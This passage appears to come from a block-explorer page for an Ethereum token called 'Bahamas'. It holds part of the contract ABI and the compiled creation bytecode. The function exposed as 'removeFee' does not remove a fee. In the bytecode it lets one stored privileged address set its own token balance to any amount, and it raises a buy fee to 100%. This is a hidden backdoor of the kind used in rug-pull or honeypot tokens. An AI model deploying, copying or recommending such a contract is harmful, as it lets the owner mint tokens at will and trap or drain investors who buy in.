ype":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"isSwapLocked","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"removeFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"pure","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

608060405261012c60015561012c60025560056003556000600860146101000a81548160ff0219169083151502179055506001600860156101000a81548160ff0219169083151502179055506000600c556000600d556000600e553480156200006757600080fd5b50620000886200007c6200082a60201b60201c565b6200083260201b60201c565b60006012600a6200009a919062000e3e565b620f4240620000aa919062000e8f565b9050620000cd620000c06200082a60201b60201c565b82620008f660201b60201c565b620000dd6200082a60201b60201c565b601060006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550737a250d5630b4cf539739df2c5dacb4c659f2488d600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550620001a730600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff168362000a9260201b60201c565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000215573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200023b919062000f44565b73ffffffffffffffffffffffffffffffffffffffff1663c9c6539630600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002c5573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002eb919062000f44565b6040518363ffffffff1660e01b81526004016200030a92919062000f87565b6020604051808303816000875af11580156200032a573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000350919062000f44565b600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663095ea7b3600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff167fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6040518363ffffffff1660e01b81526004016200043192919062000fc5565b6020604051808303816000875af115801562000451573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906200047791906200102f565b506001600a60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600a6000620004e662000c6360201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600f60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600f6000620005a562000c6360201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600f6000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b60006200068662000c6360201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b60003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b6000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001600b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff021916908315150217905550506200126c565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000968576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200095f90620010c2565b60405180910390fd5b620009848160065462000c8c60201b62000b6e1790919060201c565b600681905550620009e381600460008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000c8c60201b62000b6e1790919060201c565b600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000a869190620010e4565b60405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160362000b04576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000afb9062001177565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000b76576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000b6d906200120f565b60405180910390fd5b80600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405162000c569190620010e4565b60405180910390a3505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000818362000c9c919062001231565b905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60008160011c9050919050565b6000808291508390505b600185111562000d325780860481111562000d0a5762000d0962000ca4565b5b600185161562000d1a5780820291505b808102905062000d2a8562000cd3565b945062000cea565b94509492505050565b60008262000d4d576001905062000e20565b8162000d5d576000905062000e20565b816001811462000d76576002811462000d815762000db7565b600191505062000e20565b60ff84111562000d965762000d9562000ca4565b5b8360020a91508482111562000db05762000daf62000ca4565b5b5062000e20565b5060208310610133831016604e8410600b841016171562000df15782820a90508381111562000deb5762000dea62000ca4565b5b62000e20565b62000e00848484600162000ce0565b9250905081840481111562000e1a5762000e1962000ca4565b5b81810290505b9392505050565b6000819050919050565b600060ff82169050919050565b600062000e4b8262000e27565b915062000e588362000e31565b925062000e877fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff848462000d3b565b905092915050565b600062000e9c8262000e27565b915062000ea98362000e27565b925082820262000eb98162000e27565b9150828204841483151762000ed35762000ed262000ca4565b5b5092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b600062000f0c8262000edf565b9050919050565b62000f1e8162000eff565b811462000f2a57600080fd5b50565b60008151905062000f3e8162000f13565b92915050565b60006020828403121562000f5d5762000f5c62000eda565b5b600062000f6d8482850162000f2d565b91505092915050565b62000f818162000eff565b82525050565b600060408201905062000f9e600083018562000f76565b62000fad602083018462000f76565b9392505050565b62000fbf8162000e27565b82525050565b600060408201905062000fdc600083018562000f76565b62000feb602083018462000fb4565b9392505050565b60008115159050919050565b620010098162000ff2565b81146200101557600080fd5b50565b600081519050620010298162000ffe565b92915050565b60006020828403121562001048576200104762000eda565b5b6000620010588482850162001018565b91505092915050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b6000620010aa601f8362001061565b9150620010b78262001072565b602082019050919050565b60006020820190508181036000830152620010dd816200109b565b9050919050565b6000602082019050620010fb600083018462000fb4565b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006200115f60248362001061565b91506200116c8262001101565b604082019050919050565b60006020820190508181036000830152620011928162001150565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000620011f760228362001061565b9150620012048262001199565b604082019050919050565b600060208201905081810360008301526200122a81620011e8565b9050919050565b60006200123e8262000e27565b91506200124b8362000e27565b925082820190508082111562001266576200126562000ca4565b5b92915050565b612813806200127c6000396000f3fe6080604052600436106101395760003560e01c8063751039fc116100ab578063a457c2d71161006f578063a457c2d71461042e578063a9059cbb1461046b578063cdf4bab9146104a8578063d54f7d5e146104d3578063dd62ed3e146104fe578063f2fde38b1461053b5761016c565b8063751039fc1461036b5780637d1db4a5146103825780638d5f81e2146103ad5780638da5cb5b146103d857806395d89b41146104035761016c565b806339509351116100fd578063395093511461026c57806342966c68146102a9578063499a2818146102d257806351c6590a146102fb57806370a0823114610317578063715018a6146103545761016c565b806306fdde0314610171578063095ea7b31461019c57806318160ddd146101d957806323b872dd14610204578063313ce567146102415761016c565b3661016c577f544c765b33ca411cce832250371569244f765a17fcd217832be093f0fd5fa45b60405160405180910390a1005b600080fd5b34801561017d57600080fd5b50610186610564565b6040516101939190611cca565b60405180910390f35b3480156101a857600080fd5b506101c360048036038101906101be9190611d85565b6105a1565b6040516101d09190611de0565b60405180910390f35b3480156101e557600080fd5b506101ee6105bf565b6040516101fb9190611e0a565b60405180910390f35b34801561021057600080fd5b5061022b60048036038101906102269190611e25565b6105c9565b6040516102389190611de0565b60405180910390f35b34801561024d57600080fd5b506102566106a2565b6040516102639190611e94565b60405180910390f35b34801561027857600080fd5b50610293600480360381019061028e9190611d85565b6106ab565b6040516102a09190611de0565b60405180910390f35b3480156102b557600080fd5b506102d060048036038101906102cb9190611eaf565b61075e565b005b3480156102de57600080fd5b506102f960048036038101906102f49190611eaf565b610772565b005b61031560048036038101906103109190611eaf565b6107a0565b005b34801561032357600080fd5b5061033e60048036038101906103399190611edc565b6107fd565b60405161034b9190611e0a565b60405180910390f35b34801561036057600080fd5b50610369610846565b005b34801561037757600080fd5b5061038061085a565b005b34801561038e57600080fd5b50610397610876565b6040516103a49190611e0a565b60405180910390f35b3480156103b957600080fd5b506103c26108a8565b6040516103cf9190611f18565b60405180910390f35b3480156103e457600080fd5b506103ed6108d2565b6040516103fa9190611f18565b60405180910390f35b34801561040f57600080fd5b506104186108fb565b6040516104259190611cca565b60405180910390f35b34801561043a57600080fd5b5061045560048036038101906104509190611d85565b610938565b6040516104629190611de0565b60405180910390f35b34801561047757600080fd5b50610492600480360381019061048d9190611d85565b610a05565b60405161049f9190611de0565b60405180910390f35b3480156104b457600080fd5b506104bd610a23565b6040516104ca9190611de0565b60405180910390f35b3480156104df57600080fd5b506104e8610a3a565b6040516104f59190611f18565b60405180910390f35b34801561050a57600080fd5b5061052560048036038101906105209190611f33565b610a64565b6040516105329190611e0a565b60405180910390f35b34801561054757600080fd5b50610562600480360381019061055d9190611edc565b610aeb565b005b60606040518060400160405280600781526020017f426168616d617300000000000000000000000000000000000000000000000000815250905090565b60006105b56105ae610b84565b8484610b8c565b6001905092915050565b6000600654905090565b60006105d6848484610d55565b610697846105e2610b84565b6106928560405180606001604052806028815260200161279160289139600560008b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000610648610b84565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546116b39092919063ffffffff16565b610b8c565b600190509392505050565b60006012905090565b60006107546106b8610b84565b8461074f85600560006106c9610b84565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008973ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610b6e90919063ffffffff16565b610b8c565b6001905092915050565b61076f610769610b84565b82611708565b50565b601054331461078057600080fd5b604051338152600460208201526040812082815560648002600c55505050565b6107a86118ab565b6001600860146101000a81548160ff0219169083151502179055506107d56107ce6108d2565b3083610d55565b6107df8134611929565b6000600860146101000a81548160ff02191690831515021790555050565b6000600460008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b61084e6118ab565b6108586000611a0e565b565b6108626118ab565b612710600281905550612710600181905550565b60006108a3612710610895600254600654611ad290919063ffffffff16565b611ae890919063ffffffff16565b905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606040518060400160405280600781526020017f424148414d415300000000000000000000000000000000000000000000000000815250905090565b60006109fb610945610b84565b846109f6856040518060600160405280602581526020016127b9602591396005600061096f610b84565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546116b39092919063ffffffff16565b610b8c565b6001905092915050565b6000610a19610a12610b84565b8484610d55565b6001905092915050565b6000600860149054906101000a900460ff16905090565b6000600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6000600560008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b610af36118ab565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610b62576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b5990611fe5565b60405180910390fd5b610b6b81611a0e565b50565b60008183610b7c9190612034565b905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610bfb576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bf2906120da565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610c6a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c619061216c565b60405180910390fd5b80600560008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610d489190611e0a565b60405180910390a3505050565b610d60838383611afe565b600080610d6b6108d2565b73ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614158015610dd95750610da96108d2565b73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561134e57600f60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16158015610e825750600f60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b1561134d57600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff16148015610f325750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b8015610f885750600b60008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b8015610fde5750600b60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b156110d85761100e612710611000600254600654611ad290919063ffffffff16565b611ae890919063ffffffff16565b831115611050576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611047906121fe565b60405180910390fd5b61107b61271061106d600154600654611ad290919063ffffffff16565b611ae890919063ffffffff16565b61109684611088876107fd565b610b6e90919063ffffffff16565b11156110d7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110ce90612290565b60405180910390fd5b5b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614801561116157503073ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff1614155b156112015761118f612710611181600d5486611ad290919063ffffffff16565b611ae890919063ffffffff16565b91506111ba6127106111ac600c5486611ad290919063ffffffff16565b611ae890919063ffffffff16565b905043600960003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff161480156112ac5750600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1614155b1561134c576112da6127106112cc600d5486611ad290919063ffffffff16565b611ae890919063ffffffff16565b91506113056127106112f7600e5486611ad290919063ffffffff16565b611ae890919063ffffffff16565b905043600960003273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055505b5b5b60006113638284610b6e90919063ffffffff16565b90506000811115611502576000831115611382576113818684611708565b5b60008211156114ec576113ff8260046000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610b6e90919063ffffffff16565b60046000601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550601060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516114e39190611e0a565b60405180910390a35b6114ff8185611c2490919063ffffffff16565b93505b61156e8460405180606001604052806026815260200161276b60269139600460008a73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546116b39092919063ffffffff16565b600460008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061160384600460008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610b6e90919063ffffffff16565b600460008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508473ffffffffffffffffffffffffffffffffffffffff168673ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef866040516116a39190611e0a565b60405180910390a3505050505050565b60008383111582906116fb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016116f29190611cca565b60405180910390fd5b5082840390509392505050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611777576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161176e90612322565b60405180910390fd5b6117e38160405180606001604052806022815260200161274960229139600460008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546116b39092919063ffffffff16565b600460008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555061183b81600654611c2490919063ffffffff16565b600681905550600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161189f9190611e0a565b60405180910390a35050565b6118b3610b84565b73ffffffffffffffffffffffffffffffffffffffff166118d16108d2565b73ffffffffffffffffffffffffffffffffffffffff1614611927576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161191e9061238e565b60405180910390fd5b565b61195630600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1684610b8c565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663f305d7198230856000806119a26108d2565b426040518863ffffffff1660e01b81526004016119c4969594939291906123f3565b60606040518083038185885af11580156119e2573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190611a079190612469565b5050505050565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b60008183611ae091906124bc565b905092915050565b60008183611af6919061252d565b905092915050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611b6d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611b64906125d0565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611bdc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611bd390612662565b60405180910390fd5b60008111611c1f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611c16906126f4565b60405180910390fd5b505050565b60008183611c329190612714565b905092915050565b600081519050919050565b600082825260208201905092915050565b60005b83811015611c74578082015181840152602081019050611c59565b60008484015250505050565b6000601f19601f8301169050919050565b6000611c9c82611c3a565b611ca68185611c45565b9350611cb6818560208601611c56565b611cbf81611c80565b840191505092915050565b60006020820190508181036000830152611ce48184611c91565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000611d1c82611cf1565b9050919050565b611d2c81611d11565b8114611d3757600080fd5b50565b600081359050611d4981611d23565b92915050565b6000819050919050565b611d6281611d4f565b8114611d6d57600080fd5b50565b600081359050611d7f81611d59565b92915050565b60008060408385031215611d9c57611d9b611cec565b5b6000611daa85828601611d3a565b9250506020611dbb85828601611d70565b9150509250929050565b60008115159050919050565b611dda81611dc5565b82525050565b6000602082019050611df56000830184611dd1565b92915050565b611e0481611d4f565b82525050565b6000602082019050611e1f6000830184611dfb565b92915050565b600080600060608486031215611e3e57611e3d611cec565b5b6000611e4c86828701611d3a565b9350506020611e5d86828701611d3a565b9250506040611e6e86828701611d70565b9150509250925092565b600060ff82169050919050565b611e8e81611e78565b82525050565b6000602082019050611ea96000830184611e85565b92915050565b600060208284031215611ec557611ec4611cec565b5b6000611ed384828501611d70565b91505092915050565b600060208284031215611ef257611ef1611cec565b5b6000611f0084828501611d3a565b91505092915050565b611f1281611d11565b82525050565b6000602082019050611f2d6000830184611f09565b92915050565b60008060408385031215611f4a57611f49611cec565b5b6000611f5885828601611d3a565b9250506020611f6985828601611d3a565b9150509250929050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000611fcf602683611c45565b9150611fda82611f73565b604082019050919050565b60006020820190508181036000830152611ffe81611fc2565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061203f82611d4f565b915061204a83611d4f565b925082820190508082111561206257612061612005565b5b92915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006120c4602483611c45565b91506120cf82612068565b604082019050919050565b600060208201905081810360008301526120f3816120b7565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000612156602283611c45565b9150612161826120fa565b604082019050919050565b6000602082019050818103600083015261218581612149565b9050919050565b7f5472616e7366657220616d6f756e74206578636565647320746865206d61785460008201527f78416d6f756e742e000000000000000000000000000000000000000000000000602082015250565b60006121e8602883611c45565b91506121f38261218c565b604082019050919050565b60006020820190508181036000830152612217816121db565b9050919050565b7f45786365656473206d6178696d756d2077616c6c657420746f6b656e20616d6f60008201527f756e740000000000000000000000000000000000000000000000000000000000602082015250565b600061227a602383611c45565b91506122858261221e565b604082019050919050565b600060208201905081810360008301526122a98161226d565b9050919050565b7f45524332303a206275726e2066726f6d20746865207a65726f2061646472657360008201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b600061230c602183611c45565b9150612317826122b0565b604082019050919050565b6000602082019050818103600083015261233b816122ff565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000612378602083611c45565b915061238382612342565b602082019050919050565b600060208201905081810360008301526123a78161236b565b9050919050565b6000819050919050565b6000819050919050565b60006123dd6123d86123d3846123ae565b6123b8565b611d4f565b9050919050565b6123ed816123c2565b82525050565b600060c0820190506124086000830189611f09565b6124156020830188611dfb565b61242260408301876123e4565b61242f60608301866123e4565b61243c6080830185611f09565b61244960a0830184611dfb565b979650505050505050565b60008151905061246381611d59565b92915050565b60008060006060848603121561248257612481611cec565b5b600061249086828701612454565b93505060206124a186828701612454565b92505060406124b286828701612454565b9150509250925092565b60006124c782611d4f565b91506124d283611d4f565b92508282026124e081611d4f565b915082820484148315176124f7576124f6612005565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b600061253882611d4f565b915061254383611d4f565b925082612553576125526124fe565b5b828204905092915050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006125ba602583611c45565b91506125c58261255e565b604082019050919050565b600060208201905081810360008301526125e9816125ad565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b600061264c602383611c45565b9150612657826125f0565b604082019050919050565b6000602082019050818103600083015261267b8161263f565b9050919050565b7f5472616e7366657220616d6f756e74206d75737420626520677265617465722060008201527f7468616e207a65726f0000000000000000000000000000000000000000000000602082015250565b60006126de602983611c45565b91506126e982612682565b604082019050919050565b6000602082019050818103600083015261270d816126d1565b9050919050565b600061271f82611d4f565b915061272a83611d4f565b925082820390508181111561274257612741612005565b5b9291505056fe45524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa2646970667358221220951fc2b96c863fa756a69497d3e0fd3dbed03f55db02a12e145e739e2faba4bb64736f6c63430008120033

Deployed Bytecode

